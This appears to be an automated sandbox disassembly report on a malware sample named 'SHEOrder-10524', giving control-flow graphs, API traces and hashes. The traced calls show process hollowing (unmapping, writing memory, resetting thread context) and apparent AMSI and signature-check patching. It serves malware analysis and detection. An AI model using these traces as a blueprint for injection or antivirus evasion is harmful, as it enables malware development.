28d8bc0-28d8bdc call 28d7968 9231->9318 9258->8898 9362 28d8f53-28d904c call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28d7e58 9258->9362 9327 28d8c59-28d8d50 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28d7968 9317->9327 9324 28d8be1-28d8be6 9318->9324 9324->9327 9397 28d8d55-28d8d5a 9327->9397 9411 28d904e-28d909b call 28d7d50 call 28d7d44 9362->9411 9412 28d90a0-28d99a6 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 NtWriteVirtualMemory call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 NtWriteVirtualMemory call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 SetThreadContext NtResumeThread call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c2c2c call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28d7ac0 * 3 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28d7ac0 * 2 call 28c4824 call 28c4964 call 28c47b0 call 28c4964 call 28d7ac0 call 28c4824 call 28c4964 call 28c47b0 call 28c4964 call 28d7ac0 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 9362->9412 9397->9258 9411->9412 9412->8898
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02924398,02924388,OpenSession,02924360,028D9A30,ScanString,02924360), ref: 028D8446
                                                                                                                                                                    • GetThreadContext.KERNEL32(00000870,029243DC,ScanString,02924360,028D9A30,UacInitialize,02924360,028D9A30,ScanBuffer,02924360,028D9A30,ScanBuffer,02924360,028D9A30,UacInitialize,02924360), ref: 028D87DF
                                                                                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00221FF8,029244B0,00000004,029244B8,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360), ref: 028D8A3C
                                                                                                                                                                    • NtUnmapViewOfSection.N(0000088C,00400000,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,0000088C,00221FF8,029244B0,00000004,029244B8), ref: 028D8BB7
                                                                                                                                                                      • Part of subcall function 028D7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028D7975
                                                                                                                                                                      • Part of subcall function 028D7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D797B
                                                                                                                                                                      • Part of subcall function 028D7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
                                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00400000,00000000,11D98300,029244B8,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,ScanBuffer,02924360), ref: 028D920B
                                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00221FF8,029244B4,00000004,029244B8,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,0000088C,00400000), ref: 028D937E
                                                                                                                                                                    • SetThreadContext.KERNEL32(00000870,029243DC,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,0000088C,00221FF8,029244B4,00000004,029244B8), ref: 028D94F4
                                                                                                                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000870,00000000,00000870,029243DC,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,0000088C,00221FF8,029244B4), ref: 028D9501
                                                                                                                                                                      • Part of subcall function 028D7AC0: LoadLibraryW.KERNEL32(bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize,02924360,028D9A30,00000870,029243DC,ScanString,02924360,028D9A30), ref: 028D7AD2
                                                                                                                                                                      • Part of subcall function 028D7AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028D7ADF
                                                                                                                                                                      • Part of subcall function 028D7AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize), ref: 028D7AF6
                                                                                                                                                                      • Part of subcall function 028D7AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize,02924360,028D9A30,00000870,029243DC), ref: 028D7B05
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc$IC
                                                                                                                                                                    • API String ID: 2533507481-3678116285
                                                                                                                                                                    • Opcode ID: e13fbc2e5187c067a6d4eb1615973825d935f6bd9c94059bd2d8175c84120eff
                                                                                                                                                                    • Instruction ID: d8768a27114563571300a46970df8984c817cb96695e9db04836b5f74240a4bc
                                                                                                                                                                    • Opcode Fuzzy Hash: e13fbc2e5187c067a6d4eb1615973825d935f6bd9c94059bd2d8175c84120eff
                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE2EC3DA101789BDB51EBA8D890EDE73B6AF45701F2081A5E109E7314DB70EE89CF52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D7F46 Relevance: 43.6, APIs: 8, Strings: 16, Instructions: 1553nativeprocessthreadCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 9685 28d7f46-28d7f4b 9687 28d7f50-28d7f55 9685->9687 9687->9687 9688 28d7f57-28d803e call 28c4954 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 9687->9688 9719 28d99ab-28d9a15 call 28c44c4 * 2 call 28c4c24 call 28c44c4 call 28c44a0 call 28c44c4 * 2 9688->9719 9720 28d8044-28d811f call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 9688->9720 9720->9719 9764 28d8125-28d844d call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c3098 * 2 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4da4 call 28c4db4 CreateProcessAsUserW 9720->9764 9871 28d844f-28d84bb call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 9764->9871 9872 28d84c0-28d87e6 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c2ee0 call 28c2f08 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 GetThreadContext 9764->9872 9871->9872 9872->9719 9980 28d87ec-28d8a4f call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 NtReadVirtualMemory 9872->9980 10051 28d8d5c-28d8dc8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 9980->10051 10052 28d8a55-28d8bbe call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 NtUnmapViewOfSection 9980->10052 10079 28d8dcd-28d8f4d call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28d7968 10051->10079 10138 28d8be8-28d8c54 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 10052->10138 10139 28d8bc0-28d8be6 call 28d7968 10052->10139 10079->9719 10183 28d8f53-28d904c call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28d7e58 10079->10183 10148 28d8c59-28d8d5a call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28d7968 10138->10148 10139->10148 10148->10079 10232 28d904e-28d909b call 28d7d50 call 28d7d44 10183->10232 10233 28d90a0-28d99a6 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 NtWriteVirtualMemory call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 NtWriteVirtualMemory call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 SetThreadContext NtResumeThread call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c2c2c call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28d7ac0 * 3 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28d7ac0 * 2 call 28c4824 call 28c4964 call 28c47b0 call 28c4964 call 28d7ac0 call 28c4824 call 28c4964 call 28c47b0 call 28c4964 call 28d7ac0 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 10183->10233 10232->10233 10233->9719
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02924398,02924388,OpenSession,02924360,028D9A30,ScanString,02924360), ref: 028D8446
                                                                                                                                                                    • GetThreadContext.KERNEL32(00000870,029243DC,ScanString,02924360,028D9A30,UacInitialize,02924360,028D9A30,ScanBuffer,02924360,028D9A30,ScanBuffer,02924360,028D9A30,UacInitialize,02924360), ref: 028D87DF
                                                                                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00221FF8,029244B0,00000004,029244B8,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360), ref: 028D8A3C
                                                                                                                                                                    • NtUnmapViewOfSection.N(0000088C,00400000,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,0000088C,00221FF8,029244B0,00000004,029244B8), ref: 028D8BB7
                                                                                                                                                                      • Part of subcall function 028D7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028D7975
                                                                                                                                                                      • Part of subcall function 028D7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D797B
                                                                                                                                                                      • Part of subcall function 028D7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc$IC
                                                                                                                                                                    • API String ID: 3979268988-3678116285
                                                                                                                                                                    • Opcode ID: 33d580f981ab52f4ccb7f8ae410e7b113e13f2cba7c67fe7a55d3f91fa509e05
                                                                                                                                                                    • Instruction ID: 3a51e889f1e05188e5b8a44f4f66bf936115770ffc7b6f178406eace2d9c6496
                                                                                                                                                                    • Opcode Fuzzy Hash: 33d580f981ab52f4ccb7f8ae410e7b113e13f2cba7c67fe7a55d3f91fa509e05
                                                                                                                                                                    • Instruction Fuzzy Hash: 25E2FC3DA101789BDB51EBA8D890EDE73B6AF45701F2081A5E109E7314DB70EE89CF52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C5A90 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 10506 28c5a90-28c5ad1 GetModuleFileNameA RegOpenKeyExA 10507 28c5b13-28c5b56 call 28c58cc RegQueryValueExA 10506->10507 10508 28c5ad3-28c5aef RegOpenKeyExA 10506->10508 10515 28c5b58-28c5b74 RegQueryValueExA 10507->10515 10516 28c5b7a-28c5b94 RegCloseKey 10507->10516 10508->10507 10509 28c5af1-28c5b0d RegOpenKeyExA 10508->10509 10509->10507 10511 28c5b9c-28c5bcd lstrcpynA GetThreadLocale GetLocaleInfoA 10509->10511 10513 28c5cb6-28c5cbd 10511->10513 10514 28c5bd3-28c5bd7 10511->10514 10517 28c5bd9-28c5bdd 10514->10517 10518 28c5be3-28c5bf9 lstrlenA 10514->10518 10515->10516 10519 28c5b76 10515->10519 10517->10513 10517->10518 10521 28c5bfc-28c5bff 10518->10521 10519->10516 10522 28c5c0b-28c5c13 10521->10522 10523 28c5c01-28c5c09 10521->10523 10522->10513 10525 28c5c19-28c5c1e 10522->10525 10523->10522 10524 28c5bfb 10523->10524 10524->10521 10526 28c5c48-28c5c4a 10525->10526 10527 28c5c20-28c5c46 lstrcpynA LoadLibraryExA 10525->10527 10526->10513 10528 28c5c4c-28c5c50 10526->10528 10527->10526 10528->10513 10529 28c5c52-28c5c82 lstrcpynA LoadLibraryExA 10528->10529 10529->10513 10530 28c5c84-28c5cb4 lstrcpynA LoadLibraryExA 10529->10530 10530->10513
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,028C0000,028EB790), ref: 028C5AAC
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028C0000,028EB790), ref: 028C5ACA
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028C0000,028EB790), ref: 028C5AE8
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028C5B06
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028C5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028C5B4F
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,028C5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028C5B95,?,80000001), ref: 028C5B6D
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,028C5B9C,00000000,?,?,00000000,028C5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028C5B8F
                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028C5BAC
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028C5BB9
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028C5BBF
                                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028C5BEA
                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028C5C31
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028C5C41
                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028C5C69
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028C5C79
                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028C5C9F
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028C5CAF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                                                                                    • Opcode ID: 19f5241adbda4ef8f05dca03e4c4cf80a99a8dc25dc34b47e7d4130f69b9e1ed
                                                                                                                                                                    • Instruction ID: ddf57ca36b92a0be5cad264e45448c0e31b924d19cf702577eb5b9c010c5989f
                                                                                                                                                                    • Opcode Fuzzy Hash: 19f5241adbda4ef8f05dca03e4c4cf80a99a8dc25dc34b47e7d4130f69b9e1ed
                                                                                                                                                                    • Instruction Fuzzy Hash: C1517D7DA4020C7DFF21D6A4CC85FEFBBAD9B04744FA001A9A608F6181D778EA448F65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028DCA6C Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 400processsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 12240 28dca6c-28dca70 12241 28dca75-28dca7a 12240->12241 12241->12241 12242 28dca7c-28dcf2f call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4704 * 2 call 28c4824 call 28c473c call 28c3098 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4704 call 28c7ee8 call 28c4964 call 28c4d38 call 28c4db4 call 28c4704 call 28c4964 call 28c4d38 call 28c4db4 CreateProcessAsUserW call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 12241->12242 12403 28dd03a-28dd087 call 28c44c4 call 28c4c24 call 28c44c4 call 28c4c24 call 28c44c4 12242->12403 12404 28dcf35-28dd035 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 WaitForSingleObject CloseHandle * 2 12242->12404 12404->12403
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02924644,02924688,ScanString,02924344,028DD0A4,OpenSession,02924344), ref: 028DCDD3
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(0000086C,000000FF,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4,UacScan,02924344), ref: 028DD01F
                                                                                                                                                                    • CloseHandle.KERNEL32(0000086C,0000086C,000000FF,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4,UacScan), ref: 028DD02A
                                                                                                                                                                    • CloseHandle.KERNEL32(00000868,0000086C,0000086C,000000FF,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4), ref: 028DD035
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
